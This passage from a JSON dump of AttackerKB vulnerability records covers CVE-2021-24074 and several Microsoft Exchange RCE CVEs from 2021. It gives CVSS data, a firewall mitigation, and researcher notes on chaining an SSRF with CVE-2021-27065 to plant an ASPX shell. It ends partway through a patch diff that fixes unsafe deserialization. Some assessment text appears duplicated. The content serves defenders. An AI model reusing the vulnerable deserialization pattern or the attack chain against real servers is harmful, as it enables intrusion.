\nThere is a patch, but also, the mitigations provided in the guidance (<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24074>) involve the creation of a rule blocking source forwarding from the built-in firewall: \n`netsh int ipv4 set global sourceroutingbehavior=drop` \nSuch a change in the firewall configuration can be deployed by group policy and would not require a reboot. The rule could also be deployed to infrastructure firewalls, but would then only protect against attacks that took place across the firewall; the rules would need to be set on all Windows system host-based firewalls to protect against lateral movement within a network.\n\nAssessed Attacker Value: 2 \nAssessed Attacker Value: 2Assessed Attacker Value: 2\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-25T00:00:00", "type": "attackerkb", "title": "CVE-2021-24074", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24074", "CVE-2021-24086", "CVE-2021-24094"], "modified": "2021-03-03T00:00:00", "id": "AKB:4BB453DC-4A7E-4FAF-832B-C5079208A3DA", "href": 
"https://attackerkb.com/topics/Vcp83dpFgQ/cve-2021-24074", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-11-03T20:17:54", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26857, CVE-2021-27065, CVE-2021-27078.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-03T00:00:00", "type": "attackerkb", "title": "CVE-2021-26858", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-07-27T00:00:00", "id": "AKB:4C137002-9580-4593-83DB-D4E636E1AEFB", "href": "https://attackerkb.com/topics/TFFtD6XA8z/cve-2021-26858", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-11T15:33:28", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is 
unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27078.\n\n \n**Recent assessments:** \n \n**wvu-r7** at March 10, 2021 7:13am UTC reported:\n\nWhen used with [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), an unauthenticated SSRF, [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) yields unauthed, `SYSTEM`-level RCE against a vulnerable Exchange Server. On its own, exploiting this vulnerability requires access to the [EAC/ECP interface](<https://docs.microsoft.com/en-us/exchange/architecture/client-access/exchange-admin-center?view=exchserver-2019>), which is a privileged and authenticated web interface.\n\nI was able to identify the relevant endpoints a few days ago using a combination of patch analysis and manual testing, and I successfully wrote an arbitrary file (sans SSRF) to the target\u2019s filesystem (UNC path). Ironically, I was looking at the virtual directory settings for [EWS](<https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/ews-reference-for-exchange>), but \u201cOAB\u201d caught my eye due to its published IOCs. ([OAB](<https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/offline-address-books/offline-address-books?view=exchserver-2019>) is Microsoft\u2019s implementation of offline address books in Exchange.)\n\n\n\nWriting an ASPX shell is the easiest way to achieve RCE using CVE-2021-27065, so make sure to look for filesystem IOCs. These IOCs are [well-documented](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) by Microsoft and other entities. 
Bear in mind that attackers will try to use clever or randomized filenames to evade detection.\n\n**cdelafuente-r7** at March 24, 2021 3:26pm UTC reported:\n\nWhen used with [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), an unauthenticated SSRF, [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) yields unauthed, `SYSTEM`-level RCE against a vulnerable Exchange Server. On its own, exploiting this vulnerability requires access to the [EAC/ECP interface](<https://docs.microsoft.com/en-us/exchange/architecture/client-access/exchange-admin-center?view=exchserver-2019>), which is a privileged and authenticated web interface.\n\nI was able to identify the relevant endpoints a few days ago using a combination of patch analysis and manual testing, and I successfully wrote an arbitrary file (sans SSRF) to the target\u2019s filesystem (UNC path). Ironically, I was looking at the virtual directory settings for [EWS](<https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/ews-reference-for-exchange>), but \u201cOAB\u201d caught my eye due to its published IOCs. ([OAB](<https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/offline-address-books/offline-address-books?view=exchserver-2019>) is Microsoft\u2019s implementation of offline address books in Exchange.)\n\n\n\nWriting an ASPX shell is the easiest way to achieve RCE using CVE-2021-27065, so make sure to look for filesystem IOCs. These IOCs are [well-documented](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) by Microsoft and other entities. 
Bear in mind that attackers will try to use clever or randomized filenames to evade detection.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-03T00:00:00", "type": "attackerkb", "title": "CVE-2021-27065", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-07-27T00:00:00", "id": "AKB:BD645B28-C99E-42EA-A606-832F4F534945", "href": "https://attackerkb.com/topics/lLMDUaeKSn/cve-2021-27065", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-27T02:14:28", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.\n\n \n**Recent assessments:** \n \n**wvu-r7** at March 03, 2021 6:59pm UTC reported:\n\nAs per [Microsoft\u2019s blog 
post](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) on Exchange Server 0day use by the HAFNIUM actors, [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) is a deserialization vulnerability in Exchange Server\u2019s Unified Messaging (voicemail) service. Exploiting the vulnerability reportedly requires admin access or chaining with another vuln (likely [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>)), but successful exploitation results in RCE as the `SYSTEM` account. This vulnerability would ideally be combined with an [auth bypass](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>), which CVE-2021-26855 may very well provide.\n\nI took a look at CVE-2021-26857 last night and came up with the following patch diff:\n \n \n --- exchange.unpatched/Microsoft.Exchange.UM.UMCore/UMCore/PipelineContext.cs\t2021-03-02 19:54:18.000000000 -0600\n +++ exchange.patched/Microsoft.Exchange.UM.UMCore/UMCore/PipelineContext.cs\t2021-03-02 19:55:19.000000000 -0600\n 
@@ -1,742 +1,886 @@\n \ufeffusing System;\n +using System.Collections.Generic;\n using System.Globalization;\n using System.IO;\n +using System.Runtime.Serialization;\n +using Microsoft.Exchange.Compliance.Serialization.Formatters;\n +using Microsoft.Exchange.Data;\n +using Microsoft.Exchange.Data.Common;\n using Microsoft.Exchange.Data.Directory;\n using Microsoft.Exchange.Data.Directory.Recipient;\n using Microsoft.Exchange.Data.Directory.SystemConfiguration;\n using Microsoft.Exchange.Data.Storage;\n using Microsoft.Exchange.Diagnostics;\n using Microsoft.Exchange.Diagnostics.Components.UnifiedMessaging;\n using Microsoft.Exchange.ExchangeSystem;\n using Microsoft.Exchange.TextProcessing.Boomerang;\n using Microsoft.Exchange.UM.UMCommon;\n +using Microsoft.Mapi;\n \n namespace Microsoft.Exchange.UM.UMCore\n {\n \tinternal abstract class PipelineContext : DisposableBase, IUMCreateMessage\n \t{\n \t\tinternal PipelineContext()\n \t\t{\n \t\t}\n \n \t\tinternal PipelineContext(SubmissionHelper helper)\n \t\t{\n \t\t\tbool flag = false;\n \t\t\ttry\n \t\t\t{\n \t\t\t\tthis.helper = helper;\n \t\t\t\tthis.cultureInfo = new CultureInfo(helper.CultureInfo);\n \t\t\t\tflag = true;\n \t\t\t}\n \t\t\tfinally\n \t\t\t{\n \t\t\t\tif (!flag)\n \t\t\t\t{\n \t\t\t\t\tthis.Dispose();\n \t\t\t\t}\n \t\t\t}\n \t\t}\n \n \t\tpublic MessageItem MessageToSubmit\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.messageToSubmit;\n \t\t\t}\n \t\t\tprotected set\n \t\t\t{\n \t\t\t\tthis.messageToSubmit = value;\n \t\t\t}\n \t\t}\n \n \t\tpublic string MessageID\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.messageID;\n \t\t\t}\n \t\t\tprotected set\n \t\t\t{\n \t\t\t\tthis.messageID = value;\n \t\t\t}\n \t\t}\n \n \t\tinternal abstract Pipeline Pipeline { get; }\n \n \t\tinternal Microsoft.Exchange.UM.UMCommon.PhoneNumber CallerId\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.helper.CallerId;\n \t\t\t}\n \t\t}\n \n \t\tinternal Guid TenantGuid\n \t\t{\n \t\t\tget\n 
\t\t\t{\n \t\t\t\treturn this.helper.TenantGuid;\n \t\t\t}\n \t\t}\n \n \t\tinternal int ProcessedCount\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.processedCount;\n \t\t\t}\n \t\t}\n \n \t\tinternal ExDateTime SentTime\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.sentTime;\n \t\t\t}\n \t\t\tset\n \t\t\t{\n \t\t\t\tthis.sentTime = value;\n \t\t\t}\n \t\t}\n \n \t\tinternal CultureInfo CultureInfo\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.cultureInfo;\n \t\t\t}\n \t\t}\n \n \t\tprotected internal string HeaderFileName\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\tif (string.IsNullOrEmpty(this.headerFileName))\n \t\t\t\t{\n \t\t\t\t\tGuid guid = Guid.NewGuid();\n \t\t\t\t\tthis.headerFileName = Path.Combine(Utils.VoiceMailFilePath, guid.ToString() + \".txt\");\n \t\t\t\t}\n \t\t\t\treturn this.headerFileName;\n \t\t\t}\n \t\t\tprotected set\n \t\t\t{\n \t\t\t\tthis.headerFileName = value;\n \t\t\t}\n \t\t}\n \n \t\tprotected internal string CallerAddress\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.helper.CallerAddress;\n \t\t\t}\n \t\t\tprotected set\n \t\t\t{\n \t\t\t\tthis.helper.CallerAddress = value;\n \t\t\t}\n \t\t}\n \n \t\tprotected internal string CallerIdDisplayName\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.helper.CallerIdDisplayName;\n \t\t\t}\n \t\t\tprotected set\n \t\t\t{\n \t\t\t\tthis.helper.CallerIdDisplayName = value;\n \t\t\t}\n \t\t}\n \n \t\tprotected internal string MessageType\n \t\t{\n \t\t\tinternal get\n \t\t\t{\n \t\t\t\treturn this.messageType;\n \t\t\t}\n \t\t\tset\n \t\t\t{\n \t\t\t\tthis.messageType = value;\n \t\t\t}\n \t\t}\n \n \t\tpublic virtual void PrepareUnProtectedMessage()\n \t\t{\n \t\t\tCallIdTracer.TraceDebug(ExTraceGlobals.VoiceMailTracer, this.GetHashCode(), \"PipelineContext:PrepareUnProtectedMessage.\", Array.Empty<object>());\n \t\t\tusing (DisposeGuard disposeGuard = default(DisposeGuard))\n \t\t\t{\n \t\t\t\tthis.messageToSubmit = 
MessageItem.CreateInMemory(StoreObjectSchema.ContentConversionProperties);\n \t\t\t\tdisposeGuard.Add<MessageItem>(this.messageToSubmit);\n \t\t\t\tthis.SetMessageProperties();\n \t\t\t\tdisposeGuard.Success();\n \t\t\t}\n \t\t}\n \n \t\tpublic virtual void PrepareProtectedMessage()\n \t\t{\n \t\t\tthrow new InvalidOperationException();\n \t\t}\n \n \t\tpublic virtual void PrepareNDRForFailureToGenerateProtectedMessage()\n \t\t{\n \t\t\tthrow new InvalidOperationException();\n \t\t}\n \n \t\tpublic virtual PipelineDispatcher.WIThrottleData GetThrottlingData()\n \t\t{\n \t\t\treturn new PipelineDispatcher.WIThrottleData\n \t\t\t{\n \t\t\t\tKey = this.GetMailboxServerId(),\n \t\t\t\tRecipientId = this.GetRecipientIdForThrottling(),\n \t\t\t\tWorkItemType = PipelineDispatcher.ThrottledWorkItemType.NonCDRWorkItem\n \t\t\t};\n \t\t}\n \n \t\tpublic virtual void PostCompletion()\n \t\t{\n \t\t\tCallIdTracer.TraceDebug(ExTraceGlobals.VoiceMailTracer, 0, \"PipelineContext - Deleting header file '{0}'\", new object[]\n \t\t\t{\n \t\t\t\tthis.headerFileName\n \t\t\t});\n \t\t\tUtil.TryDeleteFile(this.headerFileName);\n \t\t}\n \n \t\tinternal static PipelineContext FromHeaderFile(string headerFile)\n \t\t{\n \t\t\tPipelineContext pipelineContext = null;\n \t\t\tPipelineContext result;\n \t\t\ttry\n \t\t\t{\n \t\t\t\tContactInfo contactInfo = null;\n \t\t\t\tstring text = null;\n \t\t\t\tint num = 0;\n \t\t\t\tExDateTime exDateTime = default(ExDateTime);\n \t\t\t\tstring text2 = null;\n \t\t\t\tSubmissionHelper submissionHelper = new SubmissionHelper();\n \t\t\t\tuint num2;\n \t\t\t\tusing (StreamReader streamReader = File.OpenText(headerFile))\n \t\t\t\t{\n \t\t\t\t\tstring text3;\n \t\t\t\t\twhile ((text3 = streamReader.ReadLine()) != null)\n \t\t\t\t\t{\n \t\t\t\t\t\tstring[] array = text3.Split(\" : \".ToCharArray(), 2, StringSplitOptions.RemoveEmptyEntries);\n \t\t\t\t\t\tif (array != null && array.Length == 2)\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tstring text4 = array[0];\n 
\t\t\t\t\t\t\tnum2 = <PrivateImplementationDetails>.ComputeStringHash(text4);\n \t\t\t\t\t\t\tif (num2 <= 872212143U)\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tif (num2 <= 134404218U)\n \t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\tif (num2 != 77294025U)\n \t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\tif (num2 != 111122938U)\n \t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\tif (num2 == 134404218U)\n +\t\t\t\t\t\t\t\t\t\t\tif (num2 != 134404218U)\n \t\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\t\tif (text4 == \"ProcessedCount\")\n -\t\t\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\t\t\tnum = Convert.ToInt32(array[1], CultureInfo.InvariantCulture) + 1;\n -\t\t\t\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"ProcessedCount\"))\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tnum = Convert.ToInt32(array[1], CultureInfo.InvariantCulture) + 1;\n +\t\t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\t\t\telse if (text4 == \"RecipientObjectGuid\")\n +\t\t\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"RecipientObjectGuid\"))\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\t\tsubmissionHelper.RecipientObjectGuid = new Guid(array[1]);\n \t\t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\t\telse if (text4 == \"CallerNAme\")\n +\t\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"CallerNAme\"))\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\tsubmissionHelper.CallerName = array[1];\n \t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\telse if (num2 <= 507978139U)\n \t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\tif 
(num2 != 152414519U)\n \t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tif (num2 == 507978139U)\n +\t\t\t\t\t\t\t\t\t\tif (num2 != 507978139U)\n \t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\tif (text4 == \"RecipientName\")\n -\t\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\t\tsubmissionHelper.RecipientName = array[1];\n -\t\t\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"RecipientName\"))\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tsubmissionHelper.RecipientName = array[1];\n +\t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\t\telse if (text4 == \"ContactInfo\")\n +\t\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tcontactInfo = (CommonUtil.Base64Deserialize(array[1]) as ContactInfo);\n -\t\t\t\t\t\t\t\t\t\tcontinue;\n +\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"ContactInfo\"))\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tException ex = null;\n +\t\t\t\t\t\t\t\t\t\ttry\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\ttry\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t\tusing (MemoryStream memoryStream = new MemoryStream(Convert.FromBase64String(array[1])))\n +\t\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t\t\tcontactInfo = (ContactInfo)TypedBinaryFormatter.DeserializeObject(memoryStream, PipelineContext.contactInfoDeserializationAllowList, null, true);\n +\t\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tcatch (ArgumentNullException ex)\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tcatch (SerializationException ex)\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tcatch (Exception ex)\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tcontinue;\n +\t\t\t\t\t\t\t\t\t\t}\n 
+\t\t\t\t\t\t\t\t\t\tfinally\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tif (ex != null)\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t\tCallIdTracer.TraceDebug(ExTraceGlobals.VoiceMailTracer, 0, \"Failed to get contactInfo from header file {0} with Error={1}\", new object[]\n +\t\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t\t\theaderFile,\n +\t\t\t\t\t\t\t\t\t\t\t\t\tex\n +\t\t\t\t\t\t\t\t\t\t\t\t});\n +\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\telse if (num2 != 707084238U)\n \t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\tif (num2 == 872212143U)\n +\t\t\t\t\t\t\t\t\tif (num2 != 872212143U)\n \t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tif (text4 == \"CallerId\")\n -\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\tsubmissionHelper.CallerId = Microsoft.Exchange.UM.UMCommon.PhoneNumber.Parse(array[1]);\n -\t\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tif (!(text4 == \"CallerId\"))\n +\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tsubmissionHelper.CallerId = Microsoft.Exchange.UM.UMCommon.PhoneNumber.Parse(array[1]);\n +\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\telse if (text4 == \"SentTime\")\n +\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\tif (!(text4 == \"SentTime\"))\n +\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\tDateTime dateTime = Convert.ToDateTime(array[1], CultureInfo.InvariantCulture);\n \t\t\t\t\t\t\t\t\texDateTime = new ExDateTime(ExTimeZone.CurrentTimeZone, dateTime);\n \t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t\telse if (num2 <= 2593661420U)\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tif (num2 <= 1526417836U)\n \t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\tif (num2 != 978885386U)\n \t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tif 
(num2 == 1526417836U)\n +\t\t\t\t\t\t\t\t\t\tif (num2 != 1526417836U)\n \t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\tif (text4 == \"MessageType\")\n -\t\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\t\ttext = array[1];\n -\t\t\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"MessageType\"))\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\ttext = array[1];\n +\t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\t\telse if (text4 == \"CallerAddress\")\n +\t\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"CallerAddress\"))\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\tsubmissionHelper.CallerAddress = array[1];\n \t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\telse if (num2 != 1850847732U)\n \t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\tif (num2 == 2593661420U)\n +\t\t\t\t\t\t\t\t\tif (num2 != 2593661420U)\n \t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tif (text4 == \"CallId\")\n -\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\tsubmissionHelper.CallId = array[1];\n -\t\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tif (!(text4 == \"CallId\"))\n +\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tsubmissionHelper.CallId = array[1];\n +\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\telse if (text4 == \"CallerIdDisplayName\")\n +\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\tif (!(text4 == \"CallerIdDisplayName\"))\n +\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\tsubmissionHelper.CallerIdDisplayName = array[1];\n \t\t\t\t\t\t\t\t\tcontinue;\n 
